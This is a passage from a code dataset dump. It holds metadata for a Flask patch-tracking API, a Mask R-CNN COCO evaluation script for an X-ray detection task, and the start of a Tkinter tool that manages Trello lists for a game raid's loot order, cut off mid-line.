ResponseCode.ret_message(code=ResponseCode.SUCCESS, data=request.json)\n", "sub_path": "patch_tracking/api/tracking.py", "file_name": "tracking.py", "file_ext": "py", "file_size_in_byte": 4450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 33, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 33, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 37, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 37, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.repo", "line_number": 37, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.branch", "line_number": 38, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 38, "usage_type": "name"}, {"api_name": "patch_tracking.api.business.delete_tracking", "line_number": 39, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 41, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 41, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 41, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 44, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 44, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_NOT_FOUND", "line_number": 44, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 45, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.repo", "line_number": 45, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.business.delete_tracking", "line_number": 46, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 48, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 48, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 48, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 51, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 51, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_NOT_FOUND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 52, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 53, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 53, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_ERROR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth.login_required", "line_number": 17, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.query.all", "line_number": 62, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 62, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 74, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 74, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 74, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 75, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 80, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 80, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 97, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 97, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 97, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 100, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 100, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 100, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 103, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 103, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter_by", "line_number": 105, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 105, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 105, "usage_type": "name"}, {"api_name": "patch_tracking.api.business.update_tracking", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 110, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 111, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 111, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INSERT_DATA_ERROR", "line_number": 111, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.business.create_tracking", "line_number": 114, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 116, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 117, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 117, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INSERT_DATA_ERROR", "line_number": 117, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 118, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 118, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "patch_tracking.api.auth.auth.login_required", "line_number": 84, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth", "line_number": 84, "usage_type": "name"}]}
+{"seq_id": "604342291", "text": "import argparse\nimport os, sys, tempfile\nimport torch\n\nthis_dir = os.path.dirname(os.path.abspath(__file__))\nroot_dir = os.path.abspath(os.path.join(this_dir, '..', '..'))\nif root_dir not in sys.path:\n sys.path.insert(0, root_dir)\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval import (\n check_expected_results,\n prepare_for_coco_detection,\n evaluate_box_proposals,\n evaluate_predictions_on_coco,\n COCOResults,\n)\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir\n\n\nparser = argparse.ArgumentParser(description=\"PyTorch Object Detection Eval\")\nparser.add_argument(\n \"--config-file\",\n default=\"/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n)\nparser.add_argument(\"--local_rank\", type=int, default=0)\nparser.add_argument(\"--no-eval\", default=False, action=\"store_true\")\nparser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n)\n\nargs = parser.parse_args()\n\ncfg.merge_from_file(args.config_file)\ncfg.merge_from_list(args.opts)\ncfg.freeze()\n\ndata_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=False)\n\ndataset_names = cfg.DATASETS.TEST\noutput_folders = [None] * len(cfg.DATASETS.TEST)\nif cfg.OUTPUT_DIR:\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n\nextra_args = dict(\n box_only=False,\n iou_types=(\"bbox\",),\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n)\n\npreds = torch.load(os.path.join(cfg.OUTPUT_DIR, \"inference\", \"tianchi_xray_eval_no_normal_bbox_in_coco\", \"predictions.pth\"))\n\n\ndef do_coco_evaluation(\n dataset,\n predictions,\n box_only,\n output_folder,\n iou_types,\n expected_results,\n expected_results_sigma_tol,\n):\n print(\"Preparing results for COCO format\")\n coco_results = {}\n if \"bbox\" in iou_types:\n print(\"Preparing bbox results\")\n coco_results[\"bbox\"] = prepare_for_coco_detection(predictions, dataset)\n\n results = COCOResults(*iou_types)\n print(\"Evaluating predictions\")\n for iou_type in iou_types:\n with tempfile.NamedTemporaryFile() as f:\n file_path = f.name\n if output_folder:\n file_path = os.path.join(output_folder, iou_type + \".json\")\n res = evaluate_predictions_on_coco(\n dataset.coco, coco_results[iou_type], file_path, iou_type\n )\n results.update(res)\n print(results)\n check_expected_results(results, expected_results, expected_results_sigma_tol)\n return results, coco_results\n\n\ndef preds_filter(preds, limit):\n cnt1 = 0\n cnt2 = 0\n for pred in preds:\n extra_fields = pred.extra_fields\n selected_ids = []\n for idx, score in enumerate(extra_fields['scores']):\n if score > limit and extra_fields['labels'][idx] in range(1, 6):\n selected_ids.append(idx)\n\n extra_fields['scores'] = extra_fields['scores'][selected_ids]\n extra_fields['labels'] = extra_fields['labels'][selected_ids]\n cnt1 = cnt1 + pred.bbox.size(0)\n pred.bbox = pred.bbox[selected_ids]\n cnt2 = cnt2 + pred.bbox.size(0)\n\n print('bbox: ', cnt1, 'to', cnt2)\n return preds\n\n\ndef main():\n preds_filter(preds, 0.05)\n\n do_coco_evaluation(\n dataset=data_loaders_val[0].dataset,\n predictions=preds,\n output_folder=output_folders[0],\n **extra_args\n )\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/tianchi_xray/eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 3836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.REMAINDER", "line_number": 35, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.merge_from_file", "line_number": 40, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 40, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.merge_from_list", "line_number": 41, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 41, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.freeze", "line_number": 42, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 42, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.data.make_data_loader", "line_number": 44, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 44, "usage_type": "argument"}, {"api_name": "maskrcnn_benchmark.config.cfg.DATASETS", "line_number": 46, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 46, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.DATASETS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 47, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", "line_number": 48, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 48, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", "line_number": 50, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 50, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.utils.miscellaneous.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg.TEST", "line_number": 57, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 57, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.TEST", "line_number": 58, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 61, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.prepare_for_coco_detection", "line_number": 77, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.COCOResults", "line_number": 79, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.evaluate_predictions_on_coco", "line_number": 86, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.check_expected_results", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "260035411", "text": "#!/usr/bin/env python3\r\n\r\nimport configparser\r\nimport logging\r\nimport os\r\nimport requests\r\nfrom tkinter import *\r\n\r\n\r\n###############################################################################\r\n# Parse configuration file\r\nfn = os.path.join(os.path.dirname(__file__), \"config.txt\")\r\nconfig = configparser.ConfigParser()\r\nconfig.read(fn)\r\n\r\n# Set json for key and token to be used with query params\r\nauth = {\"key\": config[\"auth\"][\"key\"],\r\n \"token\": config[\"auth\"][\"secret\"]}\r\n\r\n# Define logging\r\nformatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\r\nevent_log = logging.getLogger(\"events\")\r\nevent_log.setLevel(logging.INFO)\r\nfh = logging.FileHandler(\"events.log\")\r\nfh.setLevel(logging.INFO)\r\nfh.setFormatter(formatter)\r\nch = logging.StreamHandler()\r\nch.setLevel(logging.INFO)\r\nch.setFormatter(formatter)\r\nevent_log.addHandler(fh)\r\nevent_log.addHandler(ch)\r\n\r\n\r\n###############################################################################\r\n# Trello API Class\r\nclass Trello:\r\n def __init__(self, method, request, params, payload):\r\n self.base_url = \"https://api.trello.com\"\r\n self.headers = {\"Content-Type\": \"application/json\",\r\n \"accept\": \"application/json\"}\r\n self.method = method\r\n self.request = request\r\n self.params = params\r\n self.payload = payload\r\n\r\n # Sends request and returns the response\r\n def get_response(self):\r\n url = f\"{self.base_url}{self.request}\"\r\n resp = requests.request(self.method,\r\n url,\r\n headers=self.headers,\r\n params=self.params,\r\n json=self.payload)\r\n if resp.status_code is not 200:\r\n print(f\"API request failed with status: {resp.status_code}\")\r\n return resp.content\r\n return resp.json()\r\n\r\n\r\n###############################################################################\r\n# Trello Data Parse Class\r\nclass Trello_Data:\r\n def __init__(self):\r\n self.all_lists = Trello(\"GET\",\r\n f\"/1/boards/{config['trello']['board_id']}\"\r\n f\"/lists\",\r\n auth,\r\n None).get_response()\r\n self.all_cards = self.batch_get_cards()\r\n for list in self.all_lists:\r\n try:\r\n if list[\"name\"] == config[\"trello\"][\"main_master\"]:\r\n self.main_master_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_master\"]:\r\n self.tier_master_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"main_pull\"]:\r\n self.main_pull_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_pull\"]:\r\n self.tier_pull_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"main_live\"]:\r\n self.main_live_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_live\"]:\r\n self.tier_live_id = list[\"id\"]\r\n except IndexError:\r\n continue\r\n except AttributeError:\r\n pass\r\n except TypeError as e:\r\n print(e)\r\n for response in self.all_cards:\r\n try:\r\n if response[\"200\"][0][\"idList\"] == self.main_master_id:\r\n self.main_master_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_master_id:\r\n self.tier_master_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.main_pull_id:\r\n self.main_pull_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_pull_id:\r\n self.tier_pull_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.main_live_id:\r\n self.main_live_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_live_id:\r\n self.tier_live_cards = response[\"200\"]\r\n except IndexError:\r\n continue\r\n except AttributeError:\r\n pass\r\n except TypeError as e:\r\n print(e)\r\n self.members = sorted(self.main_master_cards,\r\n key=lambda i: (i['name']))\r\n\r\n def batch_get_cards(self):\r\n batch_urls = []\r\n for list in self.all_lists:\r\n batch_urls.append(f\"/lists/{list['id']}/cards\")\r\n batch_params = auth\r\n batch_params[\"urls\"] = batch_urls\r\n try:\r\n batch_response = Trello(\"GET\",\r\n f\"/1/batch\",\r\n batch_params,\r\n None).get_response()\r\n except Exception as e:\r\n print(e)\r\n del batch_params[\"urls\"]\r\n return batch_response\r\n\r\n\r\n###############################################################################\r\n# Collect and organize the initial Trello data\r\ncurrent_data = Trello_Data()\r\nsk_tracker = []\r\n\r\n\r\n###############################################################################\r\n# Buttons / Functions\r\ndef class_color(card):\r\n if card[\"labels\"][0][\"name\"] == \"Warrior\":\r\n color = config[\"colors\"][\"warrior\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Druid\":\r\n color = config[\"colors\"][\"druid\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Hunter\":\r\n color = config[\"colors\"][\"hunter\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Mage\":\r\n color = config[\"colors\"][\"mage\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Paladin\":\r\n color = config[\"colors\"][\"paladin\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Priest\":\r\n color = config[\"colors\"][\"priest\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Rogue\":\r\n color = config[\"colors\"][\"rogue\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Shaman\":\r\n color = config[\"colors\"][\"shaman\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Warlock\":\r\n color = config[\"colors\"][\"warlock\"]\r\n return color\r\n\r\n\r\ndef refresh_tklists():\r\n print(\"Refreshing lists...\")\r\n global_list.delete(0, \"end\")\r\n main_list.delete(0, \"end\")\r\n tier_list.delete(0, \"end\")\r\n active_filters = []\r\n for key, value in filters.items():\r\n if value.get() == 1:\r\n active_filters.append(key)\r\n if len(active_filters) == 0:\r\n active_filters = [\"druid\", \"hunter\", \"mage\", \"paladin\",\r\n \"priest\", \"rogue\", \"shaman\",\r\n \"warlock\", \"warrior\"]\r\n main_count = 0\r\n tier_count = 0\r\n for card in current_data.members:\r\n global_list.insert(\"end\",\r\n f\"{card['name']} - ({card['labels'][0]['name']})\")\r\n global_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n try:\r\n for card in current_data.main_live_cards:\r\n if card[\"labels\"][0][\"name\"].lower() in active_filters:\r\n main_list.insert(\"end\",\r\n f\"{card['name']} - \"\r\n f\"({card['labels'][0]['name']})\")\r\n main_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n main_count += 1\r\n for card in current_data.tier_live_cards:\r\n if card[\"labels\"][0][\"name\"].lower() in active_filters:\r\n tier_list.insert(\"end\",\r\n f\"{card['name']} - \"\r\n f\"({card['labels'][0]['name']})\")\r\n tier_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n tier_count += 1\r\n except AttributeError:\r\n pass\r\n if main_count != tier_count:\r\n print(\"WARNING: Asymmetrical counts between main and tier lists.\")\r\n main_count_label.config(fg=\"red\")\r\n tier_count_label.config(fg=\"red\")\r\n main_count_label.config(text=(f\"{config['trello']['main_live']}: \"\r\n f\"{main_count}\"))\r\n tier_count_label.config(text=(f\"{config['trello']['tier_live']}: \"\r\n f\"{tier_count}\"))\r\n print(\"Done refreshing.\")\r\n return True\r\n\r\n\r\ndef check_lists():\r\n try:\r\n if (current_data.main_live_id and\r\n current_data.main_pull_id and\r\n current_data.tier_live_id and\r\n current_data.tier_pull_id):\r\n return True\r\n except AttributeError:\r\n return False\r\n\r\n\r\ndef create_lists():\r\n global current_data\r\n current_data = Trello_Data()\r\n qparams = auth\r\n if check_lists():\r\n log_list.insert(\"end\",\r\n \"Already exists: pull/live.\")\r\n return False\r\n qparams[\"idBoard\"] = config['trello']['board_id']\r\n qparams[\"name\"] = config[\"trello\"][\"main_pull\"]\r\n qparams[\"idListSource\"] = current_data.main_master_id\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating main pull list...\")\r\n resp1 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"name\"] = config[\"trello\"][\"tier_pull\"]\r\n qparams[\"idListSource\"] = current_data.tier_master_id\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating tier pull list...\")\r\n resp2 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idListSource\"]\r\n qparams[\"name\"] = config[\"trello\"][\"main_live\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating main live list...\")\r\n resp3 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"name\"] = config[\"trello\"][\"tier_live\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating tier live list...\")\r\n resp4 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idBoard\"], qparams[\"name\"], qparams[\"pos\"]\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n print(\"Created: pull/live\")\r\n event_log.info(\"Created: pull/live\")\r\n log_list.insert(\"end\",\r\n \"Created: pull/live\")\r\n return True\r\n\r\n\r\ndef add_to_raid():\r\n global current_data\r\n current_data = Trello_Data()\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n for name in chosen_player(\"Extended\"):\r\n print(f\"Adding {name} to live lists...\")\r\n try:\r\n for card in current_data.main_pull_cards:\r\n if card[\"name\"] == name:\r\n main_card_id = card[\"id\"]\r\n main_pos = card[\"pos\"]\r\n break\r\n for card in current_data.tier_pull_cards:\r\n if card[\"name\"] == name:\r\n tier_card_id = card[\"id\"]\r\n tier_pos = card[\"pos\"]\r\n break\r\n if main_card_id and tier_card_id:\r\n qparams[\"idList\"] = current_data.main_live_id\r\n qparams[\"idCardSource\"] = main_card_id\r\n qparams[\"pos\"] = main_pos\r\n resp1 = Trello(\"POST\",\r\n \"/1/cards\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"idList\"] = current_data.tier_live_id\r\n qparams[\"idCardSource\"] = tier_card_id\r\n qparams[\"pos\"] = tier_pos\r\n resp2 = Trello(\"POST\",\r\n \"/1/cards\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"idCardSource\"], qparams[\"pos\"]\r\n qparams[\"name\"] = \"-\"\r\n resp3 = Trello(\"PUT\",\r\n f\"/1/cards/{main_card_id}\",\r\n qparams,\r\n None).get_response()\r\n resp4 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"name\"], main_card_id, tier_card_id\r\n print(f\"Added: {name}\")\r\n event_log.info(f\"Added: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Added: {name}\")\r\n except NameError:\r\n print(f\"Unable to add {name}. May have already been added.\")\r\n log_list.insert(\"end\",\r\n f\"Unable to add: {name}\")\r\n continue\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef remove_from_raid():\r\n global current_data\r\n current_data = Trello_Data()\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n for name in chosen_player(\"Extended\"):\r\n print(f\"Removing {name} from live lists...\")\r\n main_count = 0\r\n tier_count = 0\r\n main_pull_count = 0\r\n tier_pull_count = 0\r\n try:\r\n for card in current_data.main_live_cards:\r\n main_count += 1\r\n if card[\"name\"] == name:\r\n main_live_card_id = card[\"id\"]\r\n break\r\n for card in current_data.tier_live_cards:\r\n tier_count += 1\r\n if card[\"name\"] == name:\r\n tier_live_card_id = card[\"id\"]\r\n break\r\n for card in current_data.main_pull_cards:\r\n if card[\"name\"] == \"-\":\r\n main_pull_count += 1\r\n if main_pull_count == main_count:\r\n main_pull_card_id = card[\"id\"]\r\n main_pull_pos = card[\"pos\"]\r\n break\r\n for card in current_data.tier_pull_cards:\r\n if card[\"name\"] == \"-\":\r\n tier_pull_count += 1\r\n if tier_pull_count == tier_count:\r\n tier_pull_card_id = card[\"id\"]\r\n tier_pull_pos = card[\"pos\"]\r\n break\r\n if main_live_card_id and tier_live_card_id:\r\n qparams[\"idList\"] = current_data.main_pull_id\r\n qparams[\"pos\"] = main_pull_pos\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{main_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"idList\"] = current_data.tier_pull_id\r\n qparams[\"pos\"] = tier_pull_pos\r\n resp2 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp3 = Trello(\"DELETE\",\r\n f\"/1/cards/{main_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n resp4 = Trello(\"DELETE\",\r\n f\"/1/cards/{tier_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del main_live_card_id, tier_live_card_id\r\n print(f\"Removed: {name}\")\r\n event_log.info(f\"Removed: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Removed: {name}\")\r\n except NameError:\r\n print(f\"Unable to remove {name}. May have already been removed.\")\r\n log_list.insert(\"end\",\r\n f\"Unable to remove {name}.\")\r\n continue\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef mainsk():\r\n global current_data\r\n if chosen_player(\"Single\") is not False:\r\n suicide(chosen_player(\"Single\"), \"Main\")\r\n else:\r\n return False\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef tiersk():\r\n global current_data\r\n if chosen_player(\"Single\") is not False:\r\n suicide(chosen_player(\"Single\"), \"Tier\")\r\n else:\r\n return False\r\n current_data = 